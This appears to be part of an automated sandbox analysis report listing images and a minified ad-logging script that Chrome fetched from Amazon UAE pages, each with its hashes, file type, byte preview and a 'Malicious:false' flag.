                                                                                                                                                                                                                                                                      SHA-512:0905206335158C2E99E2ABA560725A0A34F7D72F287F82924C7892AFA6558065D24BE034DBFE1FA611D877E21D8B59115F2E33C2050079D468ECD1DB94A612D1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:var LoggingClientManager;(()=>{"use strict";var e={834:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=t.VISUAL_COMPLETENESS_LATENCY=t.UNCAUGHT_ERROR=t.CREATIVE_LOAD_LATENCY=void 0;const n="uncaughtError";t.UNCAUGHT_ERROR=n;const i="creativeLoadLatency";t.CREATIVE_LOAD_LATENCY=i;const o="visualCompletenessLatency";t.VISUAL_COMPLETENESS_LATENCY=o,t.default=class{constructor(e){if(this.events={uncaughtError:{}},this.timers={},this.onNewError=()=>{},this.window=e&&e.window||"undefined"!=typeof window&&window,!this.window||!this.window.document)throw new Error("Window and/or document is not defined");this.trackLoadLatency(),this.trackVisualCompletenessLatency(),this.addErrorListener()}trackLoadLatency(){this.timers[i]=new Date}trackVisualCompletenessLatency(){this.timers[o]=new Date}addErrorListener(){const e=this.events[n];this.addListener(this.window,"error",(t=>{let n=t.message;if(t.error&&t.error.stack){const e=t.message+" : "+t.error.stack;n=e.length<500?e:e.substri
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):35887
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946716244521262
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vQIgKeT2DcSlGaA2SofPsaM4obm8KXggggU93wPPHy:3gKO2QSGLof0z4obmhoOPPHy
                                                                                                                                                                                                                                                                      MD5:B3EE167D83F2D1B8F6B017D44A237ADE
                                                                                                                                                                                                                                                                      SHA1:61D8A80D71FB65D10A5F0B4D6EB3D2A7E38FEDD9
                                                                                                                                                                                                                                                                      SHA-256:BB240C899168B64DD1FC1832F6F8A09CB962FAD8A445B050BAD1131A72AD4972
                                                                                                                                                                                                                                                                      SHA-512:F5A95F120EA70C19E709C84DCAA0562D020A565FC4E29DA993C9A4E2112D4DE7D1753E29BD216E068FA78865FD931A942A6D6A34658FAFB1DC59578C88915CDB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d............................................................................................................!..1"AQa.#2B...RVq...3br..$8Cu.......%6cs.....4Sv......DFdt..............................!..1AQ."aq....2R..........BS.#br..3...C..$4c............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>.....,...^.."..6.....y.>0..I..V...Mc._.Q.\me.y.CE.*..o.zY.....$.K&.....>..n...[N...2..'..#S9.C......mG...yN1........&..#.}.n.Y..............-w.......$..._.i..7:.tH...,...G...pG.V....*U%..&l9).[\.j..;...s..V.mo........l!..EGl........~V.Y".+z....h....<..j.r.D/.>..bE...../..?.]{O..U........k.}.../Z.1G...../.?k......o.n@.Ke....J...E.dd....".&p.s]..t...K.....-.c......o....V.....e.T..b...{Li.N..e%.......Or......z[;.?.9"...V....k.*...Tm...5y!/.S.r...<a.WY*....4....F~....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x213, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):26168
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981894253788722
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:xXoMCT1P/kc3Q/bEoKqpWIU5hFUKltdJpHM:iM8Z/kc3QImWjhlPPM
                                                                                                                                                                                                                                                                      MD5:C37D87D35BD34BF3FC35DAF135894868
                                                                                                                                                                                                                                                                      SHA1:579DA99733BC992451959EAF61268A923D7C0E2D
                                                                                                                                                                                                                                                                      SHA-256:0CACA0A57C1363F527F0E62563C3B1B22E4935F09BAB1367F8A04E64DF60F650
                                                                                                                                                                                                                                                                      SHA-512:D428CF883D22E10FE7020BABF18DB585E25485B85CBBB74A14319382AA264524B8834AA0BD3E6F0EF93765E143D382F9464BC9D51E7410E916199651957FCE22
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/715CW0XxRBL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........6................................................................../...b.0..... ..l..U...k8.FB.....W.C.M.........i...L.j...I.. ..T.if.l.R..^..z..%;7fbv..`....UK...L7.Xa3.1..H....X.......6'<.."..A..P.3...9".s..o.T.G*.:..F.k..._:....:Y.6.z...*.UPr.uU.,z.C\..>&./+.L....=..d.-s7.qD .c%oa..+~.Z.3.}../E.N..XAS).......Wf......SR..k.j...&..=.{+}s..(...l..n.t...b.8o.........S....77.TEIp_.e..[-.....W!...i.w5d9.~.S..ow..F.].OE........{m...Q{.Z,.i...rK.e.l0V{1b@f{u.Y.J.\..}4....Fy...La....g....B,.J..G..9}c.<..{l}l\.U.U...V...2..m.$y.K9,..j...u.M@...w...6%.<..F........i......+h..........j.f...7..e......L.....8Q..u.y.3Y..[c..C...H.VR.@..c..c.&.b9jC....R.........#......y.m.H..M.c../...y....C..=...l...".......j..j....s..$..... F=.....^..`..kW....`j.gq....8...d.:..|..8h..O.j...../.h.......)
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):25781
                                                                                                                                                                                                                                                                      Entropy (8bit):7.965987596311549
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:70v/om1nzDPGjupe9YFu6npeeG1N3DO+y:Dm1n/GjupegzLGTzOb
                                                                                                                                                                                                                                                                      MD5:DD3025FBA8198FE551489BE56F9045FD
                                                                                                                                                                                                                                                                      SHA1:6BD2557DD7A1E1AEBBDD9E17C9E50060BC22D44A
                                                                                                                                                                                                                                                                      SHA-256:CD08BB063312BC60016C51BAE229CEB5BF9EFF4D8332B4C2F7C84232F55D1158
                                                                                                                                                                                                                                                                      SHA-512:7E59FF84DCFD09A2793F99F450A3DB753B49A1833772BC226F827CFB24C7FDC00F013C832B794797BE643DF9DB1F4680F9F039A94AE704563FD605590FFF0E22
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................0.{.."..........8.....................................................................................................................o..+b...B..GMO....?~p>.........9>.....>9.m............."..lz./Z-V.j.k...Ts.>.....*..S.T...(E...........H.u.IU~.O..2........(.......z..}.jr..o.t....Q......tn:..s]\..N..J../.....6...S............(.Z.>........r..r3...I.c.0o...{E.Q.iR..t.....v.r@0.S_..*.9....AH\9=..;.....7.f...\.y..E.$x.....dM..e.m{.d........A.>?.OX....Fg.....[..,~.a...f.9..5...&..?...|...W,s.n5[..uy.7.3.]z.c.g.5c.&E..;..B.>....n\|.....mK.h.v.......SM.=.T.u..:.W...1}[.Y......m.G.U...Y*%.....y..t.1.......i.%...........^Q..Y5...Q.X...B.....H.e]W...j.^L..a.F.......P.KCcP...1.^....T+.;c..z:u...r.......$..LS..........]..P..%.....Q.-x...c[..L.......:.w......"... .....=.....k{..a.......>i.....N.\.Wx...F
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):12724
                                                                                                                                                                                                                                                                      Entropy (8bit):7.942690940344395
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:BwDB+McMVz1my9Vc3CiNwgLj+at90Y18ofx9:mDfB1LY3CtgmatPqs7
                                                                                                                                                                                                                                                                      MD5:83D92C6A7E4CD7CE6A625468A40BDC23
                                                                                                                                                                                                                                                                      SHA1:ABFD556C1EDAEFF53E77D6AB25BF67AB064214EA
                                                                                                                                                                                                                                                                      SHA-256:3E6EB6A04010DAC80A481CBC276B215A7823DECBE7D662578D8247879BA7F2DA
                                                                                                                                                                                                                                                                      SHA-512:78F9FE55C5631279335953A7C465B26215EA0A12D517B37D523702C66D6044C3C91B03538A465F40A0875B81FE168047DD9004DB47350858785696D607168720
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................i!%.L!...?.^w..Q.=..M...5..)}..........F.X[....n.$...HI!$.f.6.J.].n..}.1V..j}.....-..hH...=..N...F......|..`..BI.$$..F4..F.T..u.5.}.?.e..E.6..oFM...%...>M~./C..<..avT.zr........H_?P.=.:..D.,....au. ......._B...eN...Jb\..j.cv5....%.....y..o.......O...y.2...T.K.7.D.H>...~......o.,.8C...s..Z......'..Yx..a.l7.g_..I....?9.+.....+..j.....y......VI.'....:...+E...VrK>..-.....n6zFVm.G.wb.J[)..U..@O.c .Y..8.c.e......ZF....Ee......5....r.kozS....S....a.X..~.a.k...|.6!..].|..f].4F{..a..._..J .d.^..u.f..%...X\.?C...K..I.....H....If.h.6j5.=8.#..Z.R.=*.....>]....6u...^.Y..BA;"..k.G?..c.k..j.v..R..q}..[..A.^....3c_L....P,[.~T1.{P..}.4K.....aC. ..8y...e{..(.m.>.q,.{K...iYvO.,Q......B..{.I.H..&}/.{.7..*....:..N\|.c...di.sfU
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D10296%26pc%3D12737%26at%3D12737%26t%3D1724264943923%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:12737
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4391
                                                                                                                                                                                                                                                                      Entropy (8bit):7.868917454643888
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:iwzyWGcaOloUcyBBWyjvCynaOLwgPEX21nAGHqDtJx6s:iwzyWGcaOlRcyBBWy2ynaOsk1A+oos
                                                                                                                                                                                                                                                                      MD5:CAB8D990B65DDF4107385735E797C0DA
                                                                                                                                                                                                                                                                      SHA1:9CA3317C28B9C0F7FEB1AA303FB795E4200B7EB8
                                                                                                                                                                                                                                                                      SHA-256:4178C50A1E51E21AD7645F9D0F79CD6123B5D41AB50EDBC7F596CC151B8DD327
                                                                                                                                                                                                                                                                      SHA-512:D2789C8FBFEE842E79B6176A2399308D414C4C661005E3017AE4990896081125633172D34BCB241B9E364E5BC22793334919AB188D2827E93F99419D0378BD60
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.........t...."..........4.................................................................i.<.|.....k..B..^.(.8.....Z.q#.G.L..#A...Vy...W.7b+.T.A.....Y.....oV\....[.l!V./...........=..Jt..$..P....B...X:R...}+.r~bc..T..H..~...z|.\....k.p....>..%.....3......hO..Y5....b.F.....l..9...5.r:.y.|8...F.....p..d6..}...S=K.c...<].S.?B..:.............V....p:'.....]..o........Fkb..{#.q.R...g..gQ..}..I....p.D..9wQ.......,.4..!....:.\..d..3/.&.....jLO~<c...P.......a1.P.=.....@......'M....(.....H..........................!1."AQ...Ta.02R... #qst..$%4d....3BCDSr.............?.......h...G+......X.c_.s...1..)..?........k...|..7.G......1.n.........1.n..........k.{.|..7...k...|.~$Q.1.C...Wq.q.t...}'.}.6.....C...N..Et*.V...V.D.=....0....FEj.....F..<F....6..........Mmo">.L.%.#V............F.......<..8...oV..Y$.A..f{.V.. ....y%..Ib
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):25478
                                                                                                                                                                                                                                                                      Entropy (8bit):7.92978121252003
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Fv+yHfEgULycC0EpJv4JBOxS4DvPslvkB:hHdU+cgJEIQOkdkB
                                                                                                                                                                                                                                                                      MD5:F8CE2302A89E6E7BAA98A5F0E55CDEB8
                                                                                                                                                                                                                                                                      SHA1:FC0B420C83AE085D860BA2E81F452189E015D56F
                                                                                                                                                                                                                                                                      SHA-256:F4735FFDC08DC53378C2C07E60E28564C27D74D986323B3CE43A861535A445F1
                                                                                                                                                                                                                                                                      SHA-512:246665FC165A768FEA2F681EE515FC3892C53CCF018C30F607CC3C4FDCB45180D1217D803DBFE5D4C76E6D28006D760D66E455DCDBE5F25CC7BD59A2DE9650EF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl-swimmingpools_440x300_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................D..............................!.1."AQ..q.#2a..B...$%5.'Cs....3RS...................................<.........................!..1."AQa..q..#2B.......$%3R...Ss............?..C.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.."1.b#.....C......aS.Y}..8...l.....ec.fp\.*.#. .A...d........2..h.9+...Z..=.....J.......$.BYaL..(.r..Oa'..ps....k..x.dS..Z.D<..Q/.e.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 167x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11086
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957933249968999
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:qk/yQh/2AkwRhFDPLTAFEAmCT+NJa3Y3TY4ukU0hvEuMI6J5n7X1Y0IDbSz68sMN:qk/ygXPLUFJmCTq0S7ukU+suJ6z7X9Iu
                                                                                                                                                                                                                                                                      MD5:1180FD3CE0DA7052A0D1AC809D95CA2D
                                                                                                                                                                                                                                                                      SHA1:E9F4CF0B2D2AE0D9EBC88818A2B224D2E79C41C9
                                                                                                                                                                                                                                                                      SHA-256:B0C58DF29283B0AC43261515DDBC4FFCB722760F9D09E8D5203F394511969FB1
                                                                                                                                                                                                                                                                      SHA-512:DDCF38826EE2DFEBA7E42C461BA096A237A66DEF651ABB536AFBA2BB1F16EB97243C76C282A84DFA235E136385B6C28785D8000C71435DBA300055E56493B18B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.#2aqBr......34Rs.....Cb....S..Td....$%t..................................................!.1.Aq2Qa.....r..#$34...............?..x.*........rg~f..?....5?..>..."..".....o.....M...$..rN.X1..Q....'..............h.^ .>..[....@.\z.":..O.s....p.f.p.M..H.e|.l.......x..~...V.~........G..o.|.................S.>..~...ApN...K..>..?....]E.....,g...[.N..@7....4.....a..8..r..`....K"..D.*H....2.@;..A......|..F..`...t..Es.?.!...o......=^..C.o......._....K].x.=$.J1.~....{.I.B......t.>.......<...W*.}[..n:..+.[.w1....uGco..O/+...m.....Qq`.,...X+.....I..........u..O...k...=-S.R...2.t.G..........2..&.....p.. M..1.....S.%.Z7....'.....[.....a..=.....V"......~W.o..p.x..(.{.7.X...'.Q...GC_}H..O...>M...B)p...'.|~..j.#.Pr......W..|..?..E.>.I....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x313, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):21265
                                                                                                                                                                                                                                                                      Entropy (8bit):7.956725232427071
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/kbCIUqsGlB5aQWod00xhcJRo9qXjRgopxl/+Gtg5LqReu0ZoJwgwuv4JK/PdAwy:/kbRhs03ldDh+7zR1pD/+J5F/Xcv4JKC
                                                                                                                                                                                                                                                                      MD5:67DB16399F9A3A773F07FB8934CC3581
                                                                                                                                                                                                                                                                      SHA1:84B9DA2F83C82E4BF873E74C6A818E662022F4BC
                                                                                                                                                                                                                                                                      SHA-256:E1A69FB271300D9FA59627A539712A2557168BC61C128CEAA25621FFE48F5BF3
                                                                                                                                                                                                                                                                      SHA-512:069744C070C60D46BDF4ACCA0D18CA473DBEF58238AD8FC0D6A87E33279E87619EDB4B0694F587527AA442EBE9B6FE265D56273A84F1381BA48B5ADCF344D2BB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......9.@.."..........6....................................................................Z<+C[wS..{.zG.=.....t.1...c........]i.+.3....1.1..l......d.C...m{.K.^.}]...e.+@..l.........fO(...j..V....(.j.9y...1..@.]..M...v..D.Z.'.+O..@.....!..........i.[9.....Y..@..b.4..I.'.;.j...f...FV|.c$.|....|..{t.W.\j.....e.............P..........<...R....!s....5.......&.Z.[........'J$..v..I..t.bV...|...e.(J..A@p..L......|.v|v..4Y.k.5..$s..z..tTz.....\..i..7L.g..u..:.:o}-+...B#.......]+..xMK3.....%..%..@.......d.X.q..l.CO....j`$...C.Cipv..^...yK.Eu..Z.D.0...J...}...R..{.,;.4.S...8...@......O.Bk..C;d..).)..f..7%.V.;6v.....+.H.....9....,.Q...n...6..A.N.S....ms...c.x$.3...Dw\..L.8...S....,n.s... ..!....3..+._.?.u.....}.c.6:...s......8n.z..S...._l.G..z......Y..g..e:[.....Pq3.2. ..<.%2..R!..l..W.....ym..9...+cOw.q=.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10406
                                                                                                                                                                                                                                                                      Entropy (8bit):7.815440877239833
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1EcK/6BZv/ZRARsuG4yyyyyyyyyyyyyyyyyyyyyyWooLRF2QDi1TkgvrDhwgrnp/:13ZvRmRByyyyyyyyyyyyyyyyyyyyyyWi
                                                                                                                                                                                                                                                                      MD5:9D45ACE8134857665827E17C6390963A
                                                                                                                                                                                                                                                                      SHA1:70E219F7CB2D66CB3BD8FBD99DB8AC0C5A4101AB
                                                                                                                                                                                                                                                                      SHA-256:BD212C5E3BB78A77FB36C047CF466C3B837E57E68C8E4D9189887FFF56FB69E7
                                                                                                                                                                                                                                                                      SHA-512:ED410486A51D492DE28341BB6F17200C008D6CA44A62932680B30A419EB1D98AA2CA9D11E5821C0F99ED45E11E05676BB5F40D8F55DF353AF63098968A4EBCAA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Smartwatches-header-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."........................................................................v...................................E....Z....9.........I...bR/.-................~..v....g#?..Z._........EUe.:.c..v..-..{..l.K.o~.vcf.u.C{{y<....U.,..U....>....<h.`.................NgW..{r..n.\at\.r{?...2....=j.o...z....u...3w.._.u...W...J..T..h.w..9R..Cg..63.H.)`................u..T..d..;.kX..{..qu-.......GF.y|M...i.../.]...*..J..7.2.]....%..(.G 6|a.c&........n_...........S.y...?.....s....-.8 .T..*..i.*.w7..%r.r.kf........5^.v..w..V...yb..3?.../4....p........................Pk.........../.................................................;.....................................................^.7....f.....+k+..s.`......]M.e..em..D..........m.j4.3+....w.o%2......................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17809
                                                                                                                                                                                                                                                                      Entropy (8bit):7.912706966602261
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:M413rWIYz/GIVwtzmiBaB8jhXFqzx6zBxME0Ed7E:D3rnYz/GogxaqdXmEC
                                                                                                                                                                                                                                                                      MD5:3B973AC986F14EC719CDD85094BC4943
                                                                                                                                                                                                                                                                      SHA1:0DF16D9B3CC6D2F31DE49E82E741C2EA6F081BC5
                                                                                                                                                                                                                                                                      SHA-256:D13CF72D1683FCBF148635B1C9875D563005EE26143CA56FB8C74A392C7CA3F4
                                                                                                                                                                                                                                                                      SHA-512:A90D8F459F2FCF2898386863FFE8031E5EA604938E1BEA072FB46EC9871F779A857D484A9DF0ECD95F70242F14AB9EA6D2C130759409D381256225787FE2EEE5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41BEfYOD4rL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../.............................................................................................................-.......W2......................;:!.c.Udf)Q..Jk.1..+..b>.}......o.C.h...yc8.....AsZ.t5...t....F.............<......>.}.....0....l{,5V..F.}...t.r.........T.|..d.g.N..}................3..C....]b.x........i.I..n..h..............[)..5.2.....m....$....9m.~.gM.;.................v....}...O..m2.;4...J..`.0......).....7..................A../...gX..zY...&C........Ir..%ES.?....T}.......e..:...............nt...v.R..o0....b.Ex...zNN1*l.`..i>.n....V.l..................O2.^....I.)....0....G..]......O@..................8........]..K.B<....w.....Yq..w..".......^Y.w....Q...}.>..............na.p...;.....w.x....Q.....[..~&2j,z3-..i..n.u+.z./.vW.9g.z..s...............MX..').......C=..D7*...K
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5698
                                                                                                                                                                                                                                                                      Entropy (8bit):7.856708842923176
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:CGroGCus0j55MxIrJoHrCVQSSXC4PzE4SyOlEqI6v4AIotT2DAfJeXWnf:CGFC/01GwdQRrzSqy2DAhaWnf
                                                                                                                                                                                                                                                                      MD5:2D8135CBECD38CB855F71FDB3247D7A6
                                                                                                                                                                                                                                                                      SHA1:8ADDEC97F10DC4B952730DBC3B45342D0B4C21E3
                                                                                                                                                                                                                                                                      SHA-256:9CB0506CA1FE591A93C3BF7DDEC9D0FB8C0F57153146B0698E5056F46B9D6AC5
                                                                                                                                                                                                                                                                      SHA-512:AA27354CE045D623892C04F115B0B2952031540AC6732F54A247C0C004456559E7ECAE1BFE74C34743478ACB28E41922D318FC4148738B77399C73846629859D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE._SY116_CB566504241_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9...................................................................... .y...\..t.?C2=L.+.H?...6...[....[.2.z..HS..5.....c..o8..^e.....m7.{..O.7........O.<..K.z.eG$.........w+..b~.....7|.......w..m..(..=.'m....ms-..?.....:....TV...c..._.).i.....`......:].*v:...k....gGP....m....>.C.>...CG...3.3...3.l...<.z...M....}%..v..sScI....^.H|.f......n]n.z.... '....l...<.z..^.T.:...w.;.\.Z..\fD.Q.5..I.8G..i...;:.|.y..\.............i....u3g..N........K(...j.H.........>.~.......................................!03.15..." 4@AP................-............................+RR}......*.r...L.kg2#)..Tw Er5r[.Z..}.0.jU.C.PZ...-......).W.2dB.....r..F|m.f0..>8.........K).%H.0....d....L.......J..a:1.%M<.5*2..p.h.f..:...e,....p5...I..P.[...Q.)F...n.a.......n.q.i.........v..yZ.q..L.....8.Y.a...\..&7
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3521
                                                                                                                                                                                                                                                                      Entropy (8bit):7.847361272893112
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:dPsAUTJ0gwjhbL/MCEJHVe42LhfjFABR9fDLsRi:GAUTJ2jJ0CEJ/2LV47w8
                                                                                                                                                                                                                                                                      MD5:F70BED8010DC4D0DE9E98E4F88271B6E
                                                                                                                                                                                                                                                                      SHA1:6C34AB338B283D6C18172D0FFE433096915EA0FA
                                                                                                                                                                                                                                                                      SHA-256:F710CD7F5AC4A346F70844B07B77EB6966CDFE4DCAA03AF5F2F4F6214ADD0664
                                                                                                                                                                                                                                                                      SHA-512:37574929694EB4C804124C9A6E21D042BA45B49BA9D0453A440FDE7814A32927B8CBC9CF703C63DF50298F4CD0F7ED6300ABF7A0DC60FF2ED9C5DCC3DC6B04A6
